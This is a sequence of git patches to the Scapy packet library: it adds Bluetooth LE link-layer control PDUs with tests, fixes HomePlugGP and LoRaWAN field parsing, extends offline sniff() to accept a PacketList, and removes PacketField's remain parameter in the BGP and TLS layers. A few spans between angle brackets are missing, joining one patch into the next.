LL_MIN_USED_CHANNELS_IND(Packet): + name = "LL_MIN_USED_CHANNELS_IND" + fields_desc = [ + BTLEPhysField('phys', 0), + ByteField("min_used_channels", 2), + ] + + +# Advertisement (37-39) channel PDUs bind_layers(BTLE, BTLE_ADV, access_addr=0x8E89BED6) bind_layers(BTLE, BTLE_DATA) bind_layers(BTLE_ADV, BTLE_ADV_IND, PDU_type=0) @@ -327,9 +606,38 @@ class CtrlPDU(Packet): bind_layers(BTLE_ADV, BTLE_CONNECT_REQ, PDU_type=5) bind_layers(BTLE_ADV, BTLE_ADV_SCAN_IND, PDU_type=6) -bind_layers(BTLE_DATA, L2CAP_Hdr, LLID=2) # BTLE_DATA / L2CAP_Hdr / ATT_Hdr +# Data channel (0-36) PDUs # LLID=1 -> Continue -bind_layers(BTLE_DATA, CtrlPDU, LLID=3) +bind_layers(BTLE_DATA, L2CAP_Hdr, LLID=2) +bind_layers(BTLE_DATA, BTLE_CTRL, LLID=3) +bind_layers(BTLE_DATA, BTLE_EMPTY_PDU, {'len': 0, 'LLID': 1}) +bind_layers(BTLE_CTRL, LL_CONNECTION_UPDATE_IND, opcode=0x00) +bind_layers(BTLE_CTRL, LL_CHANNEL_MAP_IND, opcode=0x01) +bind_layers(BTLE_CTRL, LL_TERMINATE_IND, opcode=0x02) +bind_layers(BTLE_CTRL, LL_ENC_REQ, opcode=0x03) +bind_layers(BTLE_CTRL, LL_ENC_RSP, opcode=0x04) +bind_layers(BTLE_CTRL, LL_START_ENC_REQ, opcode=0x05) +bind_layers(BTLE_CTRL, LL_START_ENC_RSP, opcode=0x06) +bind_layers(BTLE_CTRL, LL_UNKNOWN_RSP, opcode=0x07) +bind_layers(BTLE_CTRL, LL_FEATURE_REQ, opcode=0x08) +bind_layers(BTLE_CTRL, LL_FEATURE_RSP, opcode=0x09) +bind_layers(BTLE_CTRL, LL_PAUSE_ENC_REQ, opcode=0x0A) +bind_layers(BTLE_CTRL, LL_PAUSE_ENC_RSP, opcode=0x0B) +bind_layers(BTLE_CTRL, LL_VERSION_IND, opcode=0x0C) +bind_layers(BTLE_CTRL, LL_REJECT_IND, opcode=0x0D) +bind_layers(BTLE_CTRL, LL_SLAVE_FEATURE_REQ, opcode=0x0E) +bind_layers(BTLE_CTRL, LL_CONNECTION_PARAM_REQ, opcode=0x0F) +bind_layers(BTLE_CTRL, LL_CONNECTION_PARAM_RSP, opcode=0x10) +bind_layers(BTLE_CTRL, LL_REJECT_EXT_IND, opcode=0x11) +bind_layers(BTLE_CTRL, LL_PING_REQ, opcode=0x12) +bind_layers(BTLE_CTRL, LL_PING_RSP, opcode=0x13) +bind_layers(BTLE_CTRL, LL_LENGTH_REQ, opcode=0x14) +bind_layers(BTLE_CTRL, LL_LENGTH_RSP, opcode=0x15) +bind_layers(BTLE_CTRL, LL_PHY_REQ, opcode=0x16) +bind_layers(BTLE_CTRL, LL_PHY_RSP, opcode=0x17) +bind_layers(BTLE_CTRL, LL_PHY_UPDATE_IND, opcode=0x18) +bind_layers(BTLE_CTRL, LL_MIN_USED_CHANNELS_IND, opcode=0x19) + conf.l2types.register(DLT_BLUETOOTH_LE_LL, BTLE) conf.l2types.register(DLT_BLUETOOTH_LE_LL_WITH_PHDR, BTLE_RF) diff --git a/test/scapy/layers/bluetooth4LE.uts b/test/scapy/layers/bluetooth4LE.uts index 8a9a2b80932..a8cffcc0766 100644 --- a/test/scapy/layers/bluetooth4LE.uts +++ b/test/scapy/layers/bluetooth4LE.uts @@ -30,11 +30,238 @@ test1 = BTLE() / BTLE_ADV() / BTLE_ADV_IND() / EIR_Hdr() / EIR_ShortenedLocalNam test1e = BTLE(raw(test1)) assert test1e[EIR_ShortenedLocalName].local_name == b"wussa" -= BTLE_DATA + CtrlPDU += LL_CONNECTION_UPDATE_IND -test2 = BTLE(access_addr=1) / BTLE_DATA() / CtrlPDU(version=7) -test2e = BTLE(raw(test2)) -assert test2e[CtrlPDU].version == 7 +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CONNECTION_UPDATE_IND(win_size=2, win_offset=5, interval=0x400, timeout=500, instant=0xFEFE) +test = BTLE(raw(test)) +assert test[LL_CONNECTION_UPDATE_IND].win_size == 2 +assert test[LL_CONNECTION_UPDATE_IND].win_offset == 5 +assert test[LL_CONNECTION_UPDATE_IND].interval == 0x400 +assert test[LL_CONNECTION_UPDATE_IND].timeout == 500 +assert test[LL_CONNECTION_UPDATE_IND].instant == 0xFEFE + += LL_CHANNEL_MAP_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CHANNEL_MAP_IND(chM=0x1A1B1C1D1E, instant=0xFEFE) +test = BTLE(raw(test)) +assert test[LL_CHANNEL_MAP_IND].chM == 0x1A1B1C1D1E +assert test[LL_CHANNEL_MAP_IND].instant == 0xFEFE + += LL_TERMINATE_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_TERMINATE_IND(code=0x16) +test = BTLE(raw(test)) +assert test[LL_TERMINATE_IND].code == 0x16 + += LL_ENC_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_ENC_REQ(rand=0x1112131415161718, ediv=0x4321, + skdm=0x1817161514131211, ivm=0x87654321) +test = BTLE(raw(test)) +assert test[LL_ENC_REQ].rand == 0x1112131415161718 +assert test[LL_ENC_REQ].ediv == 0x4321 +assert test[LL_ENC_REQ].skdm == 0x1817161514131211 +assert test[LL_ENC_REQ].ivm == 0x87654321 + += LL_ENC_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_ENC_RSP(skds=0x1817161514131211, ivs=0x87654321) +test = BTLE(raw(test)) +assert test[LL_ENC_RSP].skds == 0x1817161514131211 +assert test[LL_ENC_RSP].ivs == 0x87654321 + += LL_START_ENC_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_START_ENC_REQ() +test = BTLE(raw(test)) +assert test[BTLE_CTRL].opcode == 5 + += LL_START_ENC_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_START_ENC_RSP() +test = BTLE(raw(test)) +assert test[BTLE_CTRL].opcode == 6 + += LL_UNKNOWN_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_UNKNOWN_RSP(code=4) +test = BTLE(raw(test)) +assert test[LL_UNKNOWN_RSP].code == 4 + += LL_FEATURE_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_FEATURE_REQ(feature_set=0x1234) +test = BTLE(raw(test)) +assert test[LL_FEATURE_REQ].feature_set == \ + "ext_reject_ind+le_ping+le_data_len_ext+tx_mod_idx+le_ext_adv" + += LL_FEATURE_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_FEATURE_RSP(feature_set=0x4321) +test = BTLE(raw(test)) +assert test[LL_FEATURE_RSP].feature_set == \ + "le_encryption+le_data_len_ext+le_2m_phy+tx_mod_idx+ch_sel_alg" + += LL_PAUSE_ENC_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_PAUSE_ENC_REQ() +test = BTLE(raw(test)) +assert test[BTLE_CTRL].opcode == 10 + += LL_PAUSE_ENC_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_PAUSE_ENC_RSP() +test = BTLE(raw(test)) +assert test[BTLE_CTRL].opcode == 11 + += LL_VERSION_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_VERSION_IND(version=7, company=0x59, subversion=1) +test = BTLE(raw(test)) +assert test[LL_VERSION_IND].version == 7 +assert test[LL_VERSION_IND].company == 0x59 +assert test[LL_VERSION_IND].subversion == 1 + += LL_REJECT_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_REJECT_IND(code=4) +test = BTLE(raw(test)) +assert test[LL_REJECT_IND].code == 4 + += LL_SLAVE_FEATURE_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_SLAVE_FEATURE_REQ(feature_set=0x1234) +test = BTLE(raw(test)) +assert test[LL_SLAVE_FEATURE_REQ].feature_set == \ + "ext_reject_ind+le_ping+le_data_len_ext+tx_mod_idx+le_ext_adv" + += LL_CONNECTION_PARAM_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CONNECTION_PARAM_REQ(interval_min=10, interval_max=12, latency=1, timeout=2, + preferred_periodicity=3, reference_conn_evt_count=4, + offset0=5, offset1=6, offset2=7, offset3=8, offset4=9, offset5=10) +test = BTLE(raw(test)) +assert test[LL_CONNECTION_PARAM_REQ].interval_min == 10 +assert test[LL_CONNECTION_PARAM_REQ].interval_max == 12 +assert test[LL_CONNECTION_PARAM_REQ].latency == 1 +assert test[LL_CONNECTION_PARAM_REQ].timeout == 2 +assert test[LL_CONNECTION_PARAM_REQ].preferred_periodicity == 3 +assert test[LL_CONNECTION_PARAM_REQ].reference_conn_evt_count == 4 +assert test[LL_CONNECTION_PARAM_REQ].offset0 == 5 +assert test[LL_CONNECTION_PARAM_REQ].offset1 == 6 +assert test[LL_CONNECTION_PARAM_REQ].offset2 == 7 +assert test[LL_CONNECTION_PARAM_REQ].offset3 == 8 +assert test[LL_CONNECTION_PARAM_REQ].offset4 == 9 +assert test[LL_CONNECTION_PARAM_REQ].offset5 == 10 + += LL_CONNECTION_PARAM_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CONNECTION_PARAM_RSP(interval_min=10, interval_max=12, latency=1, timeout=2, + preferred_periodicity=3, reference_conn_evt_count=4, + offset0=5, offset1=6, offset2=7, offset3=8, offset4=9, offset5=10) +test = BTLE(raw(test)) +assert test[LL_CONNECTION_PARAM_RSP].interval_min == 10 +assert test[LL_CONNECTION_PARAM_RSP].interval_max == 12 +assert test[LL_CONNECTION_PARAM_RSP].latency == 1 +assert test[LL_CONNECTION_PARAM_RSP].timeout == 2 +assert test[LL_CONNECTION_PARAM_RSP].preferred_periodicity == 3 +assert test[LL_CONNECTION_PARAM_RSP].reference_conn_evt_count == 4 +assert test[LL_CONNECTION_PARAM_RSP].offset0 == 5 +assert test[LL_CONNECTION_PARAM_RSP].offset1 == 6 +assert test[LL_CONNECTION_PARAM_RSP].offset2 == 7 +assert test[LL_CONNECTION_PARAM_RSP].offset3 == 8 +assert test[LL_CONNECTION_PARAM_RSP].offset4 == 9 +assert test[LL_CONNECTION_PARAM_RSP].offset5 == 10 + += LL_REJECT_EXT_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_REJECT_EXT_IND(reject_opcode=2, error_code=4) +test = BTLE(raw(test)) +assert test[LL_REJECT_EXT_IND].reject_opcode == 2 +assert test[LL_REJECT_EXT_IND].error_code == 4 + += LL_PING_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_PING_REQ() +test = BTLE(raw(test)) +assert test[BTLE_CTRL].opcode == 18 + += LL_PING_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_PING_RSP() +test = BTLE(raw(test)) +assert test[BTLE_CTRL].opcode == 19 + += LL_LENGTH_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_LENGTH_REQ(max_rx_bytes=28, max_rx_time=329, max_tx_bytes=29, max_tx_time=330) +test = BTLE(raw(test)) +assert test[LL_LENGTH_REQ].max_rx_bytes == 28 +assert test[LL_LENGTH_REQ].max_rx_time == 329 +assert test[LL_LENGTH_REQ].max_tx_bytes == 29 +assert test[LL_LENGTH_REQ].max_tx_time == 330 + += LL_LENGTH_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_LENGTH_RSP(max_tx_bytes=28, max_tx_time=329, max_rx_bytes=29, max_rx_time=330) +test = BTLE(raw(test)) +assert test[LL_LENGTH_RSP].max_tx_bytes == 28 +assert test[LL_LENGTH_RSP].max_tx_time == 329 +assert test[LL_LENGTH_RSP].max_rx_bytes == 29 +assert test[LL_LENGTH_RSP].max_rx_time == 330 + += LL_PHY_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_PHY_REQ(tx_phys="phy_1m+phy_2m", rx_phys="phy_coded") +test = BTLE(raw(test)) +assert test[LL_PHY_REQ].tx_phys == "phy_1m+phy_2m" +assert test[LL_PHY_REQ].rx_phys == "phy_coded" + += LL_PHY_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_PHY_RSP(tx_phys="phy_1m+phy_2m", rx_phys="phy_coded") +test = BTLE(raw(test)) +assert test[LL_PHY_RSP].tx_phys == "phy_1m+phy_2m" +assert test[LL_PHY_RSP].rx_phys == "phy_coded" + += LL_PHY_UPDATE_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_PHY_UPDATE_IND(tx_phy="phy_2m", rx_phy="phy_coded", instant=1234) +test = BTLE(raw(test)) +assert test[LL_PHY_UPDATE_IND].tx_phy == "phy_2m" +assert test[LL_PHY_UPDATE_IND].rx_phy == "phy_coded" +assert test[LL_PHY_UPDATE_IND].instant == 1234 + +# LL_MIN_USED_CHANNELS_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_MIN_USED_CHANNELS_IND(phys="phy_1m+phy_2m", min_used_channels=3) +test = BTLE(raw(test)) +assert test[LL_MIN_USED_CHANNELS_IND].phys == "phy_1m+phy_2m" +assert test[LL_MIN_USED_CHANNELS_IND].min_used_channels == 3 + += BTLE_DATA + BTLE_EMPTY_PDU + +test = BTLE(access_addr=1)/BTLE_DATA(LLID=1, len=0)/BTLE_EMPTY_PDU() +a = BTLE(raw(test)) +print(dir(a)) +print(a.layers) +print(a[BTLE_DATA].len, a[BTLE_DATA].LLID) +assert a[BTLE_DATA].len == 0 = BTLE_DATA + ATT_PrepareWriteReq From 4ff0deee29ea374797477163d295069d671e153b Mon Sep 17 00:00:00 2001 From: Jesse Kerkhoven Date: Mon, 11 Jan 2021 11:33:54 +0100 Subject: [PATCH 0480/1632] Fix HomeplugGP MatchVariableFieldLen MatchVariableField is not a list so count_of doesn't work. Length_of is the way to go And explicit define byte order, based on homeplugav --- scapy/contrib/homepluggp.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/homepluggp.py b/scapy/contrib/homepluggp.py index ac7ba97c9e8..e4d07a20545 100644 --- a/scapy/contrib/homepluggp.py +++ b/scapy/contrib/homepluggp.py @@ -143,7 +143,7 @@ class CM_SLAC_MATCH_REQ(Packet): fields_desc = [ByteField("ApplicationType", 0x0), ByteField("SecurityType", 0x0), FieldLenField("MatchVariableFieldLen", None, - count_of="VariableField", fmt="H"), + length_of="VariableField", fmt=" Date: Thu, 14 Jan 2021 08:09:14 +0000 Subject: [PATCH 0481/1632] Update to enable offline sniff() to use a PacketList (#3026) --- scapy/sendrecv.py | 2 +- test/regression.uts | 5 +++++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index d0612d2139c..acb5b3cf67a 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -887,7 +887,7 @@ def _write_to_pcap(packets_list): if isinstance(offline, Packet): tempfile_written, offline = _write_to_pcap([offline]) - elif isinstance(offline, list) and \ + elif isinstance(offline, (list, PacketList)) and \ all(isinstance(elt, Packet) for elt in offline): tempfile_written, offline = _write_to_pcap(offline) diff --git a/test/regression.uts b/test/regression.uts index 0219ce0f04e..3fa99744ed5 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1864,6 +1864,11 @@ fdesc = os.fdopen(fdesc, "wb") wrpcap(fdesc, pktpcap) fdesc.close() += Check offline sniff() (by PacketList) +l=sniff(offline=PacketList([IP()/TCP(),IP()/TCP()])) +assert len(l) == 2 +assert(all(TCP in p for p in l)) + = Check offline sniff() (by filename) assert list(pktpcap) == list(sniff(offline=filename)) From ba4fa10b5fe094accbbdae66f65813217af16117 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?S=C3=A9bastien=20Dudek?= Date: Thu, 14 Jan 2021 15:01:11 +0100 Subject: [PATCH 0482/1632] LoRaPHY to LoRaWAN: fixing data payload field issues (#3045) Co-authored-by: Sebastien Dudek --- scapy/contrib/loraphy2wan.py | 69 +++++++++++++++++++++++------------- test/contrib/loraphy2wan.uts | 17 +++++---- 2 files changed, 53 insertions(+), 33 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index d2ec9456aa9..313f433dc78 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -15,19 +15,19 @@ # scapy.contrib.description = LoRa PHY to WAN Layer # scapy.contrib.status = loads - """ - Copyright (C) 2020 Sebastien Dudek (@FlUxIuS @PentHertz) + Copyright (C) 2020 Sebastien Dudek (@FlUxIuS) + initially developed @PentHertz + and improved at @Trend Micro """ -from __future__ import absolute_import - from scapy.packet import Packet from scapy.fields import BitField, ByteEnumField, ByteField, \ ConditionalField, IntField, LEShortField, PacketListField, \ StrFixedLenField, X3BytesField, XByteField, XIntField, \ XShortField, BitFieldLenField, LEX3BytesField, XBitField, \ - BitEnumField, XLEIntField, StrField, PacketField + BitEnumField, XLEIntField, StrField, PacketField, \ + MultipleTypeField class FCtrl_DownLink(Packet): @@ -38,7 +38,18 @@ class FCtrl_DownLink(Packet): BitField("FPending", 0, 1), BitFieldLenField("FOptsLen", 0, 4)] - # pylint: disable=R0201 + def extract_padding(self, p): + return "", p + + +class FCtrl_Link(Packet): + name = "FCtrl_UpLink" + fields_desc = [BitField("ADR", 0, 1), + BitField("ADRACKReq", 0, 1), + BitField("ACK", 0, 1), + BitField("UpClassB_DownFPending", 0, 1), + BitFieldLenField("FOptsLen", 0, 4)] + def extract_padding(self, p): return "", p @@ -51,7 +62,6 @@ class FCtrl_UpLink(Packet): BitField("ClassB", 0, 1), BitFieldLenField("FOptsLen", 0, 4)] - # pylint: disable=R0201 def extract_padding(self, p): return "", p @@ -526,7 +536,7 @@ class FOpts(Packet): def FOptsDownShow(pkt): try: - if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101: # noqa: E501 + if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101 and (pkt.MType & 0b101 > 0): # noqa: E501 return True return False except Exception: @@ -535,7 +545,7 @@ def FOptsDownShow(pkt): def FOptsUpShow(pkt): try: - if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010: # noqa: E501 + if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010 and (pkt.MType & 0b110 > 0): # noqa: E501 return True return False except Exception: @@ -549,15 +559,13 @@ class FHDR(Packet): lambda pkt:(pkt.MType >= 0b010 and pkt.MType <= 0b101)), ConditionalField(PacketListField("FCtrl", b"", - FCtrl_DownLink, - length_from=lambda pkt:1), - lambda pkt:(pkt.MType & 0b1 == 1 and - pkt.MType <= 0b101)), - ConditionalField(PacketListField("FCtrl", b"", - FCtrl_UpLink, + FCtrl_Link, length_from=lambda pkt:1), - lambda pkt:(pkt.MType & 0b1 == 0 and - pkt.MType >= 0b010)), + lambda pkt:((pkt.MType & 0b1 == 1 and + pkt.MType <= 0b101 and + (pkt.MType & 0b10 > 0)) or + (pkt.MType & 0b1 == 0 and + pkt.MType >= 0b010))), ConditionalField(LEShortField("FCnt", 0), lambda pkt:(pkt.MType >= 0b010 and pkt.MType <= 0b101)), @@ -598,7 +606,6 @@ class Join_Accept(Packet): ConditionalField(StrFixedLenField("CFList", b"\x00" * 16, 16), # noqa: E501 lambda pkt:(Join_Accept.dcflist is True))] - # pylint: disable=R0201 def extract_padding(self, p): return "", p @@ -621,14 +628,26 @@ class RejoinReq(Packet): # LoRa 1.1 specs XShortField("RJcount0", 0)] +def dpload_type(pkt): + if (pkt.MType == 0b101 or pkt.MType == 0b011): + return 0 # downlink + elif (pkt.MType == 0b100 or pkt.MType == 0b010): + return 1 # uplink + return None + + +datapayload_list = [(StrField("DataPayload", "", remain=4), + lambda pkt:(dpload_type(pkt) == 0)), + (StrField("DataPayload", "", remain=6), + lambda pkt:(dpload_type(pkt) == 1))] + + class FRMPayload(Packet): name = "FRMPayload" - fields_desc = [ConditionalField(StrField("DataPayload", "", remain=4), # Downlink # noqa: E501 - lambda pkt:(pkt.MType == 0b101 or - pkt.MType == 0b011)), - ConditionalField(StrField("DataPayload", "", remain=6), # Uplink # noqa: E501 - lambda pkt:(pkt.MType == 0b100 or - pkt.MType == 0b010)), + fields_desc = [ConditionalField(MultipleTypeField(datapayload_list, + StrField("DataPayload", + "", remain=4)), + lambda pkt:(dpload_type(pkt) is not None)), ConditionalField(PacketListField("Join_Request_Field", b"", Join_Request, length_from=lambda pkt:18), @@ -669,6 +688,7 @@ class MACPayload(Packet): class MHDR(Packet): # Same for 1.0 as for 1.1 name = "MHDR" + fields_desc = [BitEnumField("MType", 0b000, 3, MTypes), BitField("RFU", 0b000, 3), BitField("Major", 0b00, 2)] @@ -687,6 +707,7 @@ class LoRa(Packet): # default frame (unclear specs => taken from https://www.nc name = "LoRa" version = "1.1" # default version to parse encrypted = True + fields_desc = [XBitField("Preamble", 0, 4), XBitField("PHDR", 0, 16), XBitField("PHDR_CRC", 0, 4), diff --git a/test/contrib/loraphy2wan.uts b/test/contrib/loraphy2wan.uts index bdd6fbef113..739a4a16a82 100644 --- a/test/contrib/loraphy2wan.uts +++ b/test/contrib/loraphy2wan.uts @@ -36,19 +36,12 @@ p = b'\x0f0P\x80\xad\x15\x00`\x00\x01\x00\t\xca\xfe:\x98\x89|\x8f\xd4' pkt = LoRa(p) assert pkt.MType == 4 -= Decoding piggyback MAC Commands - -p = b'\r0\xc0\x80\xad\x15\x00`\x01\x01\x00\x02\xc0\xe3N\xb7\xc7\xae' -pkt = LoRa(p) -assert pkt.FOpts_up[0].CID == 2 -assert pkt.CRC == 0xc7ae - = Decoding an encrypted JA packet LoRa.encrypted = True p = b'\x00\x00\x00 \x086\xe2\x87\xa9\x80\\\xb7\xee\x9e_\xff|\x9e\xe9z' pkt = LoRa(p) -assert pkt.Join_Accept_Encrypted == b'6\xe2\x87\xa9\x80\\\xb7\xee\x9e_\xff|\x9e\xe9z' +assert pkt.Join_Accept_Encrypted == b'\x086\xe2\x87\xa9\x80\\\xb7\xee\x9e_\xff|\x9e\xe9z' = Packet crafting: generating an unencrypted JA frame @@ -63,4 +56,10 @@ assert raw(ja) == b'J\xe1o\x03\x02\x01\xb1\x8c\x8e\x06\x00\x00' LoRa.encrypted = False pkt = LoRa(MType=0b001) pkt.Join_Accept_Field = [ja] -assert raw(pkt) == b'\x00\x00\x00 J\xe1o\x03\x02\x01\xb1\x8c\x8e\x06\x00\x00\x00\x00\x00\x00' +assert raw(pkt) == b'\x00\x00\x00 J\xe1o\x03\x02\x01\xb1\x8c\x8e\x06\x00\x00\x00\x00\x00\x00' + += Parsing Piggy back commands + +p = b'\r0\xc0\x80\xad\x15\x00`\x01\x01\x00\x02\xc0\xe3N\xb7\xc7\xae' +pkt = LoRa(p) +assert pkt.FOpts_up[0].CID == 2 From ae7bb8582d5db258255a52f5a1f263f38671eb3e Mon Sep 17 00:00:00 2001 From: rscharp <73349890+rscharp@users.noreply.github.com> Date: Thu, 14 Jan 2021 16:39:00 +0100 Subject: [PATCH 0483/1632] Remove Remain parameter from PacketField.__init__() (#2921) * Remove Remain parameter from PacketField.__init__() * Fix BGP safi/afi Co-authored-by: gpotter2 --- scapy/contrib/bgp.py | 42 +++++++++++++++++++-------------- scapy/fields.py | 3 +-- scapy/layers/tls/handshake.py | 4 ++-- scapy/layers/tls/keyexchange.py | 12 +++++----- 4 files changed, 33 insertions(+), 28 deletions(-) diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index 105791ad363..371ed1298eb 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -1650,8 +1650,8 @@ class _ExtCommValuePacketField(PacketField): __slots__ = ["type_from"] - def __init__(self, name, default, cls, remain=0, type_from=(0, 0)): - PacketField.__init__(self, name, default, cls, remain) + def __init__(self, name, default, cls, type_from=(0, 0)): + PacketField.__init__(self, name, default, cls) self.type_from = type_from def m2i(self, pkt, m): @@ -2310,7 +2310,7 @@ class BGPORFEntry(Packet): Provides an implementation of an ORF entry. References: RFC 5291 """ - + __slots__ = ["afi", "safi"] name = "ORF entry" fields_desc = [ BitEnumField("action", 0, 2, _orf_actions), @@ -2319,6 +2319,11 @@ class BGPORFEntry(Packet): StrField("value", "") ] + def __init__(self, *args, **kwargs): + self.afi = kwargs.pop("afi", 1) + self.safi = kwargs.pop("safi", 1) + super(BGPORFEntry, self).__init__(*args, **kwargs) + class _ORFNLRIPacketField(PacketField): """ @@ -2328,11 +2333,11 @@ class _ORFNLRIPacketField(PacketField): def m2i(self, pkt, m): ret = None - if _orf_entry_afi == 1: + if pkt.afi == 1: # IPv4 ret = BGPNLRI_IPv4(m) - elif _orf_entry_afi == 2: + elif pkt.afi == 2: # IPv6 ret = BGPNLRI_IPv6(m) @@ -2346,7 +2351,6 @@ class BGPORFAddressPrefix(BGPORFEntry): """ Provides an implementation of the Address Prefix ORF (RFC 5292). """ - name = "Address Prefix ORF" fields_desc = [ BitEnumField("action", 0, 2, _orf_actions), @@ -2359,11 +2363,10 @@ class BGPORFAddressPrefix(BGPORFEntry): ] -class BGPORFCoveringPrefix(Packet): +class BGPORFCoveringPrefix(BGPORFEntry): """ Provides an implementation of the CP-ORF (RFC 7543). """ - name = "CP-ORF" fields_desc = [ BitEnumField("action", 0, 2, _orf_actions), @@ -2387,12 +2390,19 @@ class BGPORFEntryPacketListField(PacketListField): def m2i(self, pkt, m): ret = None + if isinstance(pkt.underlayer, BGPRouteRefresh): + afi = pkt.underlayer.afi + safi = pkt.underlayer.safi + else: + afi = 1 + safi = 1 + # Cisco also uses 128 if pkt.orf_type == 64 or pkt.orf_type == 128: - ret = BGPORFAddressPrefix(m) + ret = BGPORFAddressPrefix(m, afi=afi, safi=safi) elif pkt.orf_type == 65: - ret = BGPORFCoveringPrefix(m) + ret = BGPORFCoveringPrefix(m, afi=afi, safi=safi) else: ret = conf.raw_layer(m) @@ -2426,19 +2436,19 @@ def getfield(self, pkt, s): elif pkt.orf_type == 65: # Covering Prefix ORF - if _orf_entry_afi == 1: + if pkt.afi == 1: # IPv4 # sequence (4 bytes) + min_len (1 byte) + max_len (1 byte) + # noqa: E501 # rt (8 bytes) + import_rt (8 bytes) + route_type (1 byte) orf_len = 23 + 4 - elif _orf_entry_afi == 2: + elif pkt.afi == 2: # IPv6 # sequence (4 bytes) + min_len (1 byte) + max_len (1 byte) + # noqa: E501 # rt (8 bytes) + import_rt (8 bytes) + route_type (1 byte) orf_len = 23 + 16 - elif _orf_entry_afi == 25: + elif pkt.afi == 25: # sequence (4 bytes) + min_len (1 byte) + max_len (1 byte) + # noqa: E501 # rt (8 bytes) + import_rt (8 bytes) route_type = orb(remain[22]) @@ -2499,11 +2509,7 @@ class BGPRouteRefresh(BGP): ShortEnumField("afi", 1, address_family_identifiers), ByteEnumField("subtype", 0, rr_message_subtypes), ByteEnumField("safi", 1, subsequent_afis), - PacketField( - 'orf_data', - "", BGPORF, - lambda p: _update_orf_afi_safi(p.afi, p.safi) - ) + PacketField('orf_data', "", BGPORF) ] diff --git a/scapy/fields.py b/scapy/fields.py index 5eacb3d7992..7448400c871 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1392,10 +1392,9 @@ def __init__(self, name, # type: str default, # type: Optional[K] pkt_cls, # type: Union[Callable[[bytes], Packet], Type[Packet]] # noqa: E501 - remain=0, # type: int ): # type: (...) -> None - super(_PacketField, self).__init__(name, default, remain=remain) + super(_PacketField, self).__init__(name, default) self.cls = pkt_cls def i2m(self, diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 794c136c3dd..15c3527da72 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -1258,9 +1258,9 @@ class _TLSCKExchKeysField(PacketField): __slots__ = ["length_from"] holds_packet = 1 - def __init__(self, name, length_from=None, remain=0): + def __init__(self, name, length_from=None): self.length_from = length_from - PacketField.__init__(self, name, None, None, remain=remain) + PacketField.__init__(self, name, None, None) def m2i(self, pkt, m): """ diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index 6c6f7fc9eeb..baf50e5afd7 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -231,9 +231,9 @@ class _TLSSignatureField(PacketField): """ __slots__ = ["length_from"] - def __init__(self, name, default, length_from=None, remain=0): + def __init__(self, name, default, length_from=None): self.length_from = length_from - PacketField.__init__(self, name, default, _TLSSignature, remain=remain) + PacketField.__init__(self, name, default, _TLSSignature) def m2i(self, pkt, m): tmp_len = self.length_from(pkt) @@ -266,9 +266,9 @@ class _TLSServerParamsField(PacketField): """ __slots__ = ["length_from"] - def __init__(self, name, default, length_from=None, remain=0): + def __init__(self, name, default, length_from=None): self.length_from = length_from - PacketField.__init__(self, name, default, None, remain=remain) + PacketField.__init__(self, name, default, None) def m2i(self, pkt, m): s = pkt.tls_session @@ -456,10 +456,10 @@ def 